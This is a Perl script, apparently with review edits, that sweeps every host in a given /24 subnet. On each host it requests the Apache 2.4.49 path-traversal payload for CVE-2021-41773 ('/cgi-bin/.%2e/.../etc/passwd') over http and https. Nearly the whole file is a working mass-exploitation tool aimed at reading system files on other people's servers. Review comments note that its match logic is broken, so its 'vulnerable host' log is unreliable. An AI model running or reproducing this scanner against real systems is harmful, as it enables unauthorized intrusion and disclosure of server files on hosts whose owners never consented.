#!/usr/bin/env perl
# Apache 2.4.49 Directory Traversal Vulnerability (CVE-2021-41773)
# https://isc.sans.edu/diary/Apache+2449+Directory+Traversal+Vulnerability+CVE202141773/27908
# [1] https://httpd.apache.org/security/vulnerabilities_24.html
# [2] https://www.kb.cert.org/vuls/id/111677
# written by bleu@brainforcesolutions.com

use strict;

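# Walk host addresses .1 through .254 under the three-octet IPv4 prefix given
# as the first argument, request the CVE-2021-41773 test path from each host
# over http and https with the external `GET` program, and open output.txt
# for results.
#
# NOTE(review): the response checks below test $_ rather than the fetched
# response, and any text matching the second pattern also matches the first,
# so the branch that writes to output.txt is never taken. An empty output.txt
# is therefore not evidence that the probed hosts are unaffected. The intended
# match condition cannot be recovered from this file; confirm with the author.
my $subnet   = $ARGV[0];
my $prn_flag = 0;

# The prefix becomes part of an argument to an external program, so accept
# only three dotted groups of digits. The original numeric comparison
# (`$subnet == " "`) let arbitrary text such as "1;cmd" reach a shell via
# backticks. Octet ranges are not checked; the pattern only excludes shell
# and URL metacharacters.
if (!defined $subnet || $subnet !~ /\A[0-9]{1,3}(?:\.[0-9]{1,3}){2}\z/) {
    print "\nExample: $0 192.168.0\n\n";
    exit 0;
}

# Fail loudly if the results file cannot be created instead of discarding
# every later write.
open(my $out_fh, '>', 'output.txt')
    or die "Cannot open output.txt for writing: $!\n";

# Run `GET -t 20 <url> HTTP/1.1` without a shell and return everything it
# writes to stdout, or undef when the program cannot be started. The trailing
# 'HTTP/1.1' is kept as a separate argument exactly as in the original command.
sub _fetch_url {
    my ($url) = @_;

    # List-form pipe open: arguments go straight to exec, never through sh.
    open(my $pipe, '-|', 'GET', '-t', '20', $url, 'HTTP/1.1')
        or return;
    my $body = do { local $/; <$pipe> };
    close($pipe);

    return $body;
}

for my $host_octet (1 .. 254) {
    my $target = "$subnet.$host_octet";
    print("Scaning host: $target\n");

    for my $scheme ('http', 'https') {
        my $response
            = _fetch_url("$scheme://$target/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd");
        next unless $response;

        # NOTE(review): these tests read $_, which nothing in this script
        # sets; the elsif is unreachable (see the header note). Kept as
        # written because the intended condition is unknown.
        if ($_ =~ /<(.+)>/) {
            $prn_flag = 0;
        }
        elsif ($_ =~ /^\<\/(.+)>/) {
            $prn_flag = 1;
            # The original guard was `if ($prn_flag = 1)`, an assignment that
            # is always true; test the flag that was just set instead.
            print $_ if $prn_flag;
            print {$out_fh} $target . "\n";
            print {$out_fh} $_;
        }
    }
}

# Buffered write errors surface at close, so check it.
close($out_fh) or die "Cannot close output.txt: $!\n";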
